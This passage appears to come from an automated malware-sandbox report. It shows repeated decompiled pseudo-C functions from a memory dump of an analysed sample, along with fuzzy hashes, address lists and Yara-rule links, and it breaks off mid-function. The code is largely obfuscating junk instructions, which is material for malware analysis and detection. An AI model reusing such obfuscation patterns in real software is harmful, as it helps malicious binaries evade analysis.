Opcode Fuzzy Hash: 5fc25daa7d58a4900186798a9e3d8e16d6ec604d045925e37970ef8cf856410b
Instruction Fuzzy Hash: CF81AE5193EA44C6D217293486486715A48FF97343330EB7F89A7B60E166BE0E8B748F

Uniqueness

Uniqueness Score: -1.00%

Function 004027CE, Relevance: 1.6, APIs: 1, Instructions: 364
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E004027CE(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				void* _t63;
				signed int _t65;

				_t63 = __edi;
				 *_t65 =  *_t65 ^ _t65;
				asm("insd");
				asm("loope 0xffffffe3");
				asm("loope 0xffffffe3");
				asm("loope 0xffffffe3");
				asm("loope 0x49");
				while(1) {
					_t63 = _t63 + 1;
					asm("clc");
					asm("fabs");
					asm("loope 0x68");
					asm("paddb xmm0, xmm0");
					asm("paddb mm0, mm0");
					asm("cld");
					asm("aas");
					__eax = __eax - 1;
					asm("paddsw mm6, mm3");
					asm("psubw mm3, mm3");
					__eax = __eax + 1;
					asm("clc");
					__ecx = __ecx - 1;
					asm("fsubrp st4, st0");
					asm("fsqrt");
					__ecx = __ecx - 1;
					__ecx = __ecx + 1;
					__eflags = __ecx;
					__edi = __edi - 1;
					asm("wait");
					asm("fyl2xp1");
					__edi = __edi + 1;
					__eflags = __ecx;
					if(__ecx != 0) {
						asm("fnop");
						__edx = __edx - 1;
						asm("punpcklwd xmm5, xmm3");
						asm("fprem");
						__edx = __edx + 1;
						asm("wait");
						asm("fninit");
						__fp0 = __fp0 / st5;
						asm("pcmpgtd mm4, mm0");
						__ecx = __ecx - 1;
						__ecx = __ecx + 1;
						__edi = __edi - 1;
						asm("pxor mm6, mm4");
						asm("fdivr st7, st0");
						continue;
					}
					asm("wait");
					asm("fclex");
					asm("packsswb mm5, mm1");
					__eax = __eax + 1;
					asm("fldl2t");
					asm("paddd xmm2, xmm0");
					__eax = __imp__#690;
					asm("clc");
					__ebx = __ebx - 1;
					asm("fst st1");
					asm("fdivrp st3, st0");
					__ebx = __ebx + 1;
					__ecx = 0x89d3ec;
					__edi = __edi - 1;
					asm("psubusb xmm4, xmm5");
					asm("psraw xmm0, xmm3");
					__edi = __edi + 1;
					0x89d3eb = 0x89d3ec;
					asm("packuswb xmm3, xmm5");
					asm("fyl2x");
					0xd4786f = 0xd4786e;
					__ecx = 0xd4786f;
					asm("fclex");
					asm("psrlq xmm7, 0xf4");
					asm("clc");
					__ecx = 0x97ad6e;
					__ebx = __ebx - 1;
					__fp0 = __fp0 - st3;
					asm("f2xm1");
					__ebx = __ebx + 1;
					__edx = __edx - 1;
					__edx = __edx + 1;
					asm("fcomp st0, st3");
					asm("emms");
					__ecx = 0x905a4d;
					asm("cld");
					__ecx = 0x905a4c;
					asm("fclex");
					asm("wait");
					__ecx = 0x905a4d;
					__esi = __esi - 1;
					__esi = __esi + 1;
					asm("fprem1");
					asm("wait");
					asm("fclex");
					asm("clc");
					do {
						__esi = __esi - 1;
						asm("paddusw xmm1, xmm7");
						asm("fldl2t");
						__esi = __esi + 1;
						__eax = __eax - 1;
						__eax = __eax + 1;
						asm("fldl2e");
						asm("fst st1");
						__eax = __eax - 1;
						asm("clc");
						__ecx = __ecx - 1;
						asm("fnop");
						asm("psubusb xmm4, xmm5");
						__ecx = __ecx + 1;
						__eflags =  *__eax - __ecx;
						asm("invalid");
						asm("fscale");
						asm("packuswb xmm3, xmm5");
						asm("invalid");
					} while (__eflags != 0);
					__edx = __edx - 1;
					asm("fsin");
					asm("fclex");
					__edx = __edx + 1;
					__eax = __eax - 1;
					__eax = __eax + 1;
					asm("fldz");
					__fp0 = __fp0 - st3;
					__ecx = 0x45f5;
					__edi = __edi - 1;
					__edi = __edi + 1;
					asm("pcmpgtw mm6, mm2");
					asm("fcomp st0, st3");
					asm("clc");
					__ecx = 0x364e;
					asm("cld");
					asm("fxch st0, st1");
					asm("fclex");
					__edi = __edi - 1;
					__edi = __edi + 1;
					__ecx = 0x16ba;
					asm("fdecstp");
					asm("fprem1");
					__edi = __edi - 1;
					__eflags = __edi;
					__edi = __edi + 1;
					__ecx = 0x16b9;
					asm("pcmpeqb mm3, mm6");
					asm("paddusw xmm1, xmm7");
					__ecx = 0x16ba;
					__ecx = 0x10cc;
					__eflags = 0x45f5;
					asm("int1");
					if (0x45f5 <= 0) goto L63;
					_push(es);
				}
			}

0x004027ce
0x004027a7
0x004027a8
0x00402797
0x00402798
0x00402799
0x0040279a
0x0040279b
0x0040279b
0x0040279d
0x0040279e
0x0040279f
0x004027a0
0x004027a1
0x004027a2
0x004027a5
0x004027e7
0x004027e8
0x004027eb
0x00402836
0x00402837
0x00402838
0x00402839
0x0040283b
0x0040288e
0x0040288f
0x0040288f
0x00402890
0x00402891
0x00402892
0x004028de
0x004028df
0x004028e1
0x00402699
0x0040269b
0x0040269c
0x004026a0
0x004026eb
0x004026ed
0x004026ee
0x004026f0
0x004026f2
0x00402741
0x00402742
0x00402743
0x00402744
0x00402747
0x00000000
0x00402747
0x004028e7
0x004028e8
0x004028ea
0x0040293c
0x0040293e
0x00402940
0x00402990
0x00402995
0x00402996
0x00402997
0x00402999
0x004029dd
0x004029de
0x004029e3
0x004029e4
0x004029e8
0x00402a2d
0x00402a2f
0x00402a30
0x00402a34
0x00402a88
0x00402a89
0x00402a8a
0x00402a8c
0x00402adc
0x00402add
0x00402ae3
0x00402ae4
0x00402ae6
0x00402b2f
0x00402b30
0x00402b31
0x00402b32
0x00402b34
0x00402b7d
0x00402b83
0x00402b84
0x00402b85
0x00402b87
0x00402bd1
0x00402bd2
0x00402bd3
0x00402bd4
0x00402bd6
0x00402bd7
0x00402c23
0x00402c24
0x00402c24
0x00402c25
0x00402c29
0x00402c77
0x00402c78
0x00402c79
0x00402c7a
0x00402c7c
0x00402cbd
0x00402cbe
0x00402cbf
0x00402cc0
0x00402cc2
0x00402d08
0x00402d09
0x00402d0b
0x00402d0e
0x00402d10
0x00402d62
0x00402d62
0x00402d6b
0x00402d6c
0x00402d6e
0x00402dc2
0x00402dc3
0x00402dc4
0x00402dc5
0x00402dc7
0x00402e13
0x00402e18
0x00402e19
0x00402e1a
0x00402e1d
0x00402e5f
0x00402e60
0x00402e66
0x00402e67
0x00402e69
0x00402eb8
0x00402eb9
0x00402eba
0x00402ec0
0x00402ec2
0x00402f07
0x00402f07
0x00402f08
0x00402f09
0x00402f0a
0x00402f0d
0x00402f53
0x00402f54
0x00402f54
0x00402f55
0x00402f56
0x00402f57
0x00402f57

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab0d9eb558551181094bfefa4bf8f2ebb7e5162aa0fd46c951a634693dce46e8
Instruction ID: 0cb659a2fe367ea8ac1869f670afe262c03240db7fe118dfea657f009ebb08f2
Opcode Fuzzy Hash: ab0d9eb558551181094bfefa4bf8f2ebb7e5162aa0fd46c951a634693dce46e8
Instruction Fuzzy Hash: 5781AE5193EA44C6D217293086486715A48FF97343330EB7F89A7B60E166BE0E8B74CF

Uniqueness

Uniqueness Score: -1.00%

Function 004027BC, Relevance: 1.6, APIs: 1, Instructions: 362
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E004027BC(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				void* _t63;

				_t63 = __edi;
				asm("loope 0xffffffe3");
				asm("loope 0xffffffe3");
				asm("loope 0xffffffe3");
				asm("loope 0x49");
				while(1) {
					_t63 = _t63 + 1;
					asm("clc");
					asm("fabs");
					asm("loope 0x68");
					asm("paddb xmm0, xmm0");
					asm("paddb mm0, mm0");
					asm("cld");
					asm("aas");
					__eax = __eax - 1;
					asm("paddsw mm6, mm3");
					asm("psubw mm3, mm3");
					__eax = __eax + 1;
					asm("clc");
					__ecx = __ecx - 1;
					asm("fsubrp st4, st0");
					asm("fsqrt");
					__ecx = __ecx - 1;
					__ecx = __ecx + 1;
					__eflags = __ecx;
					__edi = __edi - 1;
					asm("wait");
					asm("fyl2xp1");
					__edi = __edi + 1;
					__eflags = __ecx;
					if(__ecx != 0) {
						asm("fnop");
						__edx = __edx - 1;
						asm("punpcklwd xmm5, xmm3");
						asm("fprem");
						__edx = __edx + 1;
						asm("wait");
						asm("fninit");
						__fp0 = __fp0 / st5;
						asm("pcmpgtd mm4, mm0");
						__ecx = __ecx - 1;
						__ecx = __ecx + 1;
						__edi = __edi - 1;
						asm("pxor mm6, mm4");
						asm("fdivr st7, st0");
						continue;
					}
					asm("wait");
					asm("fclex");
					asm("packsswb mm5, mm1");
					__eax = __eax + 1;
					asm("fldl2t");
					asm("paddd xmm2, xmm0");
					__eax = __imp__#690;
					asm("clc");
					__ebx = __ebx - 1;
					asm("fst st1");
					asm("fdivrp st3, st0");
					__ebx = __ebx + 1;
					__ecx = 0x89d3ec;
					__edi = __edi - 1;
					asm("psubusb xmm4, xmm5");
					asm("psraw xmm0, xmm3");
					__edi = __edi + 1;
					0x89d3eb = 0x89d3ec;
					asm("packuswb xmm3, xmm5");
					asm("fyl2x");
					0xd4786f = 0xd4786e;
					__ecx = 0xd4786f;
					asm("fclex");
					asm("psrlq xmm7, 0xf4");
					asm("clc");
					__ecx = 0x97ad6e;
					__ebx = __ebx - 1;
					__fp0 = __fp0 - st3;
					asm("f2xm1");
					__ebx = __ebx + 1;
					__edx = __edx - 1;
					__edx = __edx + 1;
					asm("fcomp st0, st3");
					asm("emms");
					__ecx = 0x905a4d;
					asm("cld");
					__ecx = 0x905a4c;
					asm("fclex");
					asm("wait");
					__ecx = 0x905a4d;
					__esi = __esi - 1;
					__esi = __esi + 1;
					asm("fprem1");
					asm("wait");
					asm("fclex");
					asm("clc");
					do {
						__esi = __esi - 1;
						asm("paddusw xmm1, xmm7");
						asm("fldl2t");
						__esi = __esi + 1;
						__eax = __eax - 1;
						__eax = __eax + 1;
						asm("fldl2e");
						asm("fst st1");
						__eax = __eax - 1;
						asm("clc");
						__ecx = __ecx - 1;
						asm("fnop");
						asm("psubusb xmm4, xmm5");
						__ecx = __ecx + 1;
						__eflags =  *__eax - __ecx;
						asm("invalid");
						asm("fscale");
						asm("packuswb xmm3, xmm5");
						asm("invalid");
					} while (__eflags != 0);
					__edx = __edx - 1;
					asm("fsin");
					asm("fclex");
					__edx = __edx + 1;
					__eax = __eax - 1;
					__eax = __eax + 1;
					asm("fldz");
					__fp0 = __fp0 - st3;
					__ecx = 0x45f5;
					__edi = __edi - 1;
					__edi = __edi + 1;
					asm("pcmpgtw mm6, mm2");
					asm("fcomp st0, st3");
					asm("clc");
					__ecx = 0x364e;
					asm("cld");
					asm("fxch st0, st1");
					asm("fclex");
					__edi = __edi - 1;
					__edi = __edi + 1;
					__ecx = 0x16ba;
					asm("fdecstp");
					asm("fprem1");
					__edi = __edi - 1;
					__eflags = __edi;
					__edi = __edi + 1;
					__ecx = 0x16b9;
					asm("pcmpeqb mm3, mm6");
					asm("paddusw xmm1, xmm7");
					__ecx = 0x16ba;
					__ecx = 0x10cc;
					__eflags = 0x45f5;
					asm("int1");
					if (0x45f5 <= 0) goto L60;
					_push(es);
				}
			}

0x004027bc
0x00402797
0x00402798
0x00402799
0x0040279a
0x0040279b
0x0040279b
0x0040279d
0x0040279e
0x0040279f
0x004027a0
0x004027a1
0x004027a2
0x004027a5
0x004027e7
0x004027e8
0x004027eb
0x00402836
0x00402837
0x00402838
0x00402839
0x0040283b
0x0040288e
0x0040288f
0x0040288f
0x00402890
0x00402891
0x00402892
0x004028de
0x004028df
0x004028e1
0x00402699
0x0040269b
0x0040269c
0x004026a0
0x004026eb
0x004026ed
0x004026ee
0x004026f0
0x004026f2
0x00402741
0x00402742
0x00402743
0x00402744
0x00402747
0x00000000
0x00402747
0x004028e7
0x004028e8
0x004028ea
0x0040293c
0x0040293e
0x00402940
0x00402990
0x00402995
0x00402996
0x00402997
0x00402999
0x004029dd
0x004029de
0x004029e3
0x004029e4
0x004029e8
0x00402a2d
0x00402a2f
0x00402a30
0x00402a34
0x00402a88
0x00402a89
0x00402a8a
0x00402a8c
0x00402adc
0x00402add
0x00402ae3
0x00402ae4
0x00402ae6
0x00402b2f
0x00402b30
0x00402b31
0x00402b32
0x00402b34
0x00402b7d
0x00402b83
0x00402b84
0x00402b85
0x00402b87
0x00402bd1
0x00402bd2
0x00402bd3
0x00402bd4
0x00402bd6
0x00402bd7
0x00402c23
0x00402c24
0x00402c24
0x00402c25
0x00402c29
0x00402c77
0x00402c78
0x00402c79
0x00402c7a
0x00402c7c
0x00402cbd
0x00402cbe
0x00402cbf
0x00402cc0
0x00402cc2
0x00402d08
0x00402d09
0x00402d0b
0x00402d0e
0x00402d10
0x00402d62
0x00402d62
0x00402d6b
0x00402d6c
0x00402d6e
0x00402dc2
0x00402dc3
0x00402dc4
0x00402dc5
0x00402dc7
0x00402e13
0x00402e18
0x00402e19
0x00402e1a
0x00402e1d
0x00402e5f
0x00402e60
0x00402e66
0x00402e67
0x00402e69
0x00402eb8
0x00402eb9
0x00402eba
0x00402ec0
0x00402ec2
0x00402f07
0x00402f07
0x00402f08
0x00402f09
0x00402f0a
0x00402f0d
0x00402f53
0x00402f54
0x00402f54
0x00402f55
0x00402f56
0x00402f57
0x00402f57

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a67c426f480971da3b8817d262c1765ff71af6cabd0ff99ff864472120440f0d
Instruction ID: bb4048378129b945018ba1d540e3f752cb53c4df88128fdd5163e000b7940573
Opcode Fuzzy Hash: a67c426f480971da3b8817d262c1765ff71af6cabd0ff99ff864472120440f0d
Instruction Fuzzy Hash: 6481AD5193EA44C6D217293086486715A48FF97343330EB7F89A7B60E166BE0E8B748F

Uniqueness

Uniqueness Score: -1.00%

Function 004027BE, Relevance: 1.6, APIs: 1, Instructions: 361
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E004027BE(void* __eax, unsigned char __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				unsigned char _t59;
				void* _t62;

				_t62 = __edi;
				_t59 = __ebx;
				asm("loope 0xffffffe3");
				asm("loope 0xffffffe3");
				asm("loope 0xffffffe3");
				asm("loope 0x49");
				while(1) {
					_t62 = _t62 + 1;
					asm("clc");
					asm("fabs");
					asm("loope 0x68");
					asm("paddb xmm0, xmm0");
					asm("paddb mm0, mm0");
					asm("cld");
					_t59 = _t59 >> 0x3f;
					asm("aas");
					__eax = __eax - 1;
					asm("paddsw mm6, mm3");
					asm("psubw mm3, mm3");
					__eax = __eax + 1;
					asm("clc");
					__ecx = __ecx - 1;
					asm("fsubrp st4, st0");
					asm("fsqrt");
					__ecx = __ecx - 1;
					__ecx = __ecx + 1;
					__eflags = __ecx;
					__edi = __edi - 1;
					asm("wait");
					asm("fyl2xp1");
					__edi = __edi + 1;
					__eflags = __ecx;
					if(__ecx != 0) {
						asm("fnop");
						__edx = __edx - 1;
						asm("punpcklwd xmm5, xmm3");
						asm("fprem");
						__edx = __edx + 1;
						asm("wait");
						asm("fninit");
						__fp0 = __fp0 / st5;
						asm("pcmpgtd mm4, mm0");
						__ecx = __ecx - 1;
						__ecx = __ecx + 1;
						__edi = __edi - 1;
						asm("pxor mm6, mm4");
						asm("fdivr st7, st0");
						continue;
					}
					asm("wait");
					asm("fclex");
					asm("packsswb mm5, mm1");
					__eax = __eax + 1;
					asm("fldl2t");
					asm("paddd xmm2, xmm0");
					__eax = __imp__#690;
					asm("clc");
					__ebx = __ebx - 1;
					asm("fst st1");
					asm("fdivrp st3, st0");
					__ebx = __ebx + 1;
					__ecx = 0x89d3ec;
					__edi = __edi - 1;
					asm("psubusb xmm4, xmm5");
					asm("psraw xmm0, xmm3");
					__edi = __edi + 1;
					0x89d3eb = 0x89d3ec;
					asm("packuswb xmm3, xmm5");
					asm("fyl2x");
					0xd4786f = 0xd4786e;
					__ecx = 0xd4786f;
					asm("fclex");
					asm("psrlq xmm7, 0xf4");
					asm("clc");
					__ecx = 0x97ad6e;
					__ebx = __ebx - 1;
					__fp0 = __fp0 - st3;
					asm("f2xm1");
					__ebx = __ebx + 1;
					__edx = __edx - 1;
					__edx = __edx + 1;
					asm("fcomp st0, st3");
					asm("emms");
					__ecx = 0x905a4d;
					asm("cld");
					__ecx = 0x905a4c;
					asm("fclex");
					asm("wait");
					__ecx = 0x905a4d;
					__esi = __esi - 1;
					__esi = __esi + 1;
					asm("fprem1");
					asm("wait");
					asm("fclex");
					asm("clc");
					do {
						__esi = __esi - 1;
						asm("paddusw xmm1, xmm7");
						asm("fldl2t");
						__esi = __esi + 1;
						__eax = __eax - 1;
						__eax = __eax + 1;
						asm("fldl2e");
						asm("fst st1");
						__eax = __eax - 1;
						asm("clc");
						__ecx = __ecx - 1;
						asm("fnop");
						asm("psubusb xmm4, xmm5");
						__ecx = __ecx + 1;
						__eflags =  *__eax - __ecx;
						asm("invalid");
						asm("fscale");
						asm("packuswb xmm3, xmm5");
						asm("invalid");
					} while (__eflags != 0);
					__edx = __edx - 1;
					asm("fsin");
					asm("fclex");
					__edx = __edx + 1;
					__eax = __eax - 1;
					__eax = __eax + 1;
					asm("fldz");
					__fp0 = __fp0 - st3;
					__ecx = 0x45f5;
					__edi = __edi - 1;
					__edi = __edi + 1;
					asm("pcmpgtw mm6, mm2");
					asm("fcomp st0, st3");
					asm("clc");
					__ecx = 0x364e;
					asm("cld");
					asm("fxch st0, st1");
					asm("fclex");
					__edi = __edi - 1;
					__edi = __edi + 1;
					__ecx = 0x16ba;
					asm("fdecstp");
					asm("fprem1");
					__edi = __edi - 1;
					__eflags = __edi;
					__edi = __edi + 1;
					__ecx = 0x16b9;
					asm("pcmpeqb mm3, mm6");
					asm("paddusw xmm1, xmm7");
					__ecx = 0x16ba;
					__ecx = 0x10cc;
					__eflags = 0x45f5;
					asm("int1");
					if (0x45f5 <= 0) goto L59;
					_push(es);
				}
			}

0x004027be
0x004027be
0x00402797
0x00402798
0x00402799
0x0040279a
0x0040279b
0x0040279b
0x0040279d
0x0040279e
0x0040279f
0x004027a0
0x004027a1
0x004027a2
0x004027a3
0x004027a5
0x004027e7
0x004027e8
0x004027eb
0x00402836
0x00402837
0x00402838
0x00402839
0x0040283b
0x0040288e
0x0040288f
0x0040288f
0x00402890
0x00402891
0x00402892
0x004028de
0x004028df
0x004028e1
0x00402699
0x0040269b
0x0040269c
0x004026a0
0x004026eb
0x004026ed
0x004026ee
0x004026f0
0x004026f2
0x00402741
0x00402742
0x00402743
0x00402744
0x00402747
0x00000000
0x00402747
0x004028e7
0x004028e8
0x004028ea
0x0040293c
0x0040293e
0x00402940
0x00402990
0x00402995
0x00402996
0x00402997
0x00402999
0x004029dd
0x004029de
0x004029e3
0x004029e4
0x004029e8
0x00402a2d
0x00402a2f
0x00402a30
0x00402a34
0x00402a88
0x00402a89
0x00402a8a
0x00402a8c
0x00402adc
0x00402add
0x00402ae3
0x00402ae4
0x00402ae6
0x00402b2f
0x00402b30
0x00402b31
0x00402b32
0x00402b34
0x00402b7d
0x00402b83
0x00402b84
0x00402b85
0x00402b87
0x00402bd1
0x00402bd2
0x00402bd3
0x00402bd4
0x00402bd6
0x00402bd7
0x00402c23
0x00402c24
0x00402c24
0x00402c25
0x00402c29
0x00402c77
0x00402c78
0x00402c79
0x00402c7a
0x00402c7c
0x00402cbd
0x00402cbe
0x00402cbf
0x00402cc0
0x00402cc2
0x00402d08
0x00402d09
0x00402d0b
0x00402d0e
0x00402d10
0x00402d62
0x00402d62
0x00402d6b
0x00402d6c
0x00402d6e
0x00402dc2
0x00402dc3
0x00402dc4
0x00402dc5
0x00402dc7
0x00402e13
0x00402e18
0x00402e19
0x00402e1a
0x00402e1d
0x00402e5f
0x00402e60
0x00402e66
0x00402e67
0x00402e69
0x00402eb8
0x00402eb9
0x00402eba
0x00402ec0
0x00402ec2
0x00402f07
0x00402f07
0x00402f08
0x00402f09
0x00402f0a
0x00402f0d
0x00402f53
0x00402f54
0x00402f54
0x00402f55
0x00402f56
0x00402f57
0x00402f57

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 983f1da9a627802c473f8d6aa605095289e6fe6363f855ea8f343b6ddb4c2845
Instruction ID: 2d11ecfc2983fb4ab7363acbc7fc5bfc73feb143326f3b6fe9a38e3aa12441e8
Opcode Fuzzy Hash: 983f1da9a627802c473f8d6aa605095289e6fe6363f855ea8f343b6ddb4c2845
Instruction Fuzzy Hash: 3F81AE5193EA44C6D217293086486715A48FF97343330EB7F89A7B60E166BE0E8B74CF

Uniqueness

Uniqueness Score: -1.00%

Function 004027C0, Relevance: 1.6, APIs: 1, Instructions: 360
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E004027C0(void* __eax, unsigned char __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				unsigned char _t59;
				void* _t62;

				_t62 = __edi;
				_t59 = __ebx;
				asm("loope 0xffffffe3");
				asm("loope 0x49");
				while(1) {
					_t62 = _t62 + 1;
					asm("clc");
					asm("fabs");
					asm("loope 0x68");
					asm("paddb xmm0, xmm0");
					asm("paddb mm0, mm0");
					asm("cld");
					_t59 = _t59 >> 0x3f;
					asm("aas");
					__eax = __eax - 1;
					asm("paddsw mm6, mm3");
					asm("psubw mm3, mm3");
					__eax = __eax + 1;
					asm("clc");
					__ecx = __ecx - 1;
					asm("fsubrp st4, st0");
					asm("fsqrt");
					__ecx = __ecx - 1;
					__ecx = __ecx + 1;
					__eflags = __ecx;
					__edi = __edi - 1;
					asm("wait");
					asm("fyl2xp1");
					__edi = __edi + 1;
					__eflags = __ecx;
					if(__ecx != 0) {
						asm("fnop");
						__edx = __edx - 1;
						asm("punpcklwd xmm5, xmm3");
						asm("fprem");
						__edx = __edx + 1;
						asm("wait");
						asm("fninit");
						__fp0 = __fp0 / st5;
						asm("pcmpgtd mm4, mm0");
						__ecx = __ecx - 1;
						__ecx = __ecx + 1;
						__edi = __edi - 1;
						asm("pxor mm6, mm4");
						asm("fdivr st7, st0");
						continue;
					}
					asm("wait");
					asm("fclex");
					asm("packsswb mm5, mm1");
					__eax = __eax + 1;
					asm("fldl2t");
					asm("paddd xmm2, xmm0");
					__eax = __imp__#690;
					asm("clc");
					__ebx = __ebx - 1;
					asm("fst st1");
					asm("fdivrp st3, st0");
					__ebx = __ebx + 1;
					__ecx = 0x89d3ec;
					__edi = __edi - 1;
					asm("psubusb xmm4, xmm5");
					asm("psraw xmm0, xmm3");
					__edi = __edi + 1;
					0x89d3eb = 0x89d3ec;
					asm("packuswb xmm3, xmm5");
					asm("fyl2x");
					0xd4786f = 0xd4786e;
					__ecx = 0xd4786f;
					asm("fclex");
					asm("psrlq xmm7, 0xf4");
					asm("clc");
					__ecx = 0x97ad6e;
					__ebx = __ebx - 1;
					__fp0 = __fp0 - st3;
					asm("f2xm1");
					__ebx = __ebx + 1;
					__edx = __edx - 1;
					__edx = __edx + 1;
					asm("fcomp st0, st3");
					asm("emms");
					__ecx = 0x905a4d;
					asm("cld");
					__ecx = 0x905a4c;
					asm("fclex");
					asm("wait");
					__ecx = 0x905a4d;
					__esi = __esi - 1;
					__esi = __esi + 1;
					asm("fprem1");
					asm("wait");
					asm("fclex");
					asm("clc");
					do {
						__esi = __esi - 1;
						asm("paddusw xmm1, xmm7");
						asm("fldl2t");
						__esi = __esi + 1;
						__eax = __eax - 1;
						__eax = __eax + 1;
						asm("fldl2e");
						asm("fst st1");
						__eax = __eax - 1;
						asm("clc");
						__ecx = __ecx - 1;
						asm("fnop");
						asm("psubusb xmm4, xmm5");
						__ecx = __ecx + 1;
						__eflags =  *__eax - __ecx;
						asm("invalid");
						asm("fscale");
						asm("packuswb xmm3, xmm5");
						asm("invalid");
					} while (__eflags != 0);
					__edx = __edx - 1;
					asm("fsin");
					asm("fclex");
					__edx = __edx + 1;
					__eax = __eax - 1;
					__eax = __eax + 1;
					asm("fldz");
					__fp0 = __fp0 - st3;
					__ecx = 0x45f5;
					__edi = __edi - 1;
					__edi = __edi + 1;
					asm("pcmpgtw mm6, mm2");
					asm("fcomp st0, st3");
					asm("clc");
					__ecx = 0x364e;
					asm("cld");
					asm("fxch st0, st1");
					asm("fclex");
					__edi = __edi - 1;
					__edi = __edi + 1;
					__ecx = 0x16ba;
					asm("fdecstp");
					asm("fprem1");
					__edi = __edi - 1;
					__eflags = __edi;
					__edi = __edi + 1;
					__ecx = 0x16b9;
					asm("pcmpeqb mm3, mm6");
					asm("paddusw xmm1, xmm7");
					__ecx = 0x16ba;
					__ecx = 0x10cc;
					__eflags = 0x45f5;
					asm("int1");
					if (0x45f5 <= 0) goto L57;
					_push(es);
				}
			}

0x004027c0
0x004027c0
0x00402799
0x0040279a
0x0040279b
0x0040279b
0x0040279d
0x0040279e
0x0040279f
0x004027a0
0x004027a1
0x004027a2
0x004027a3
0x004027a5
0x004027e7
0x004027e8
0x004027eb
0x00402836
0x00402837
0x00402838
0x00402839
0x0040283b
0x0040288e
0x0040288f
0x0040288f
0x00402890
0x00402891
0x00402892
0x004028de
0x004028df
0x004028e1
0x00402699
0x0040269b
0x0040269c
0x004026a0
0x004026eb
0x004026ed
0x004026ee
0x004026f0
0x004026f2
0x00402741
0x00402742
0x00402743
0x00402744
0x00402747
0x00000000
0x00402747
0x004028e7
0x004028e8
0x004028ea
0x0040293c
0x0040293e
0x00402940
0x00402990
0x00402995
0x00402996
0x00402997
0x00402999
0x004029dd
0x004029de
0x004029e3
0x004029e4
0x004029e8
0x00402a2d
0x00402a2f
0x00402a30
0x00402a34
0x00402a88
0x00402a89
0x00402a8a
0x00402a8c
0x00402adc
0x00402add
0x00402ae3
0x00402ae4
0x00402ae6
0x00402b2f
0x00402b30
0x00402b31
0x00402b32
0x00402b34
0x00402b7d
0x00402b83
0x00402b84
0x00402b85
0x00402b87
0x00402bd1
0x00402bd2
0x00402bd3
0x00402bd4
0x00402bd6
0x00402bd7
0x00402c23
0x00402c24
0x00402c24
0x00402c25
0x00402c29
0x00402c77
0x00402c78
0x00402c79
0x00402c7a
0x00402c7c
0x00402cbd
0x00402cbe
0x00402cbf
0x00402cc0
0x00402cc2
0x00402d08
0x00402d09
0x00402d0b
0x00402d0e
0x00402d10
0x00402d62
0x00402d62
0x00402d6b
0x00402d6c
0x00402d6e
0x00402dc2
0x00402dc3
0x00402dc4
0x00402dc5
0x00402dc7
0x00402e13
0x00402e18
0x00402e19
0x00402e1a
0x00402e1d
0x00402e5f
0x00402e60
0x00402e66
0x00402e67
0x00402e69
0x00402eb8
0x00402eb9
0x00402eba
0x00402ec0
0x00402ec2
0x00402f07
0x00402f07
0x00402f08
0x00402f09
0x00402f0a
0x00402f0d
0x00402f53
0x00402f54
0x00402f54
0x00402f55
0x00402f56
0x00402f57
0x00402f57

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c57c609ba8615f1aaf2b32ef1a26d72e7af28e512723220e143e01d385dbb028
Instruction ID: 114a40d1b2915a79c29d073bc3d7be4da670f9602f419ee2e44dca7ca9180825
Opcode Fuzzy Hash: c57c609ba8615f1aaf2b32ef1a26d72e7af28e512723220e143e01d385dbb028
Instruction Fuzzy Hash: BD81BF5193EA44C6D217293086486715A48FF97343330EB7F89A7B60E166BE0E8B74CF

Uniqueness

Uniqueness Score: -1.00%

Function 004027AC, Relevance: 1.6, APIs: 1, Instructions: 360
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E004027AC(void* __eax, unsigned char __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				unsigned char _t59;
				void* _t62;

				_t62 = __edi;
				_t59 = __ebx;
				asm("loope 0xffffffe3");
				asm("loope 0x49");
				while(1) {
					_t62 = _t62 + 1;
					asm("clc");
					asm("fabs");
					asm("loope 0x68");
					asm("paddb xmm0, xmm0");
					asm("paddb mm0, mm0");
					asm("cld");
					_t59 = _t59 >> 0x3f;
					asm("aas");
					__eax = __eax - 1;
					asm("paddsw mm6, mm3");
					asm("psubw mm3, mm3");
					__eax = __eax + 1;
					asm("clc");
					__ecx = __ecx - 1;
					asm("fsubrp st4, st0");
					asm("fsqrt");
					__ecx = __ecx - 1;
					__ecx = __ecx + 1;
					__eflags = __ecx;
					__edi = __edi - 1;
					asm("wait");
					asm("fyl2xp1");
					__edi = __edi + 1;
					__eflags = __ecx;
					if(__ecx != 0) {
						asm("fnop");
						__edx = __edx - 1;
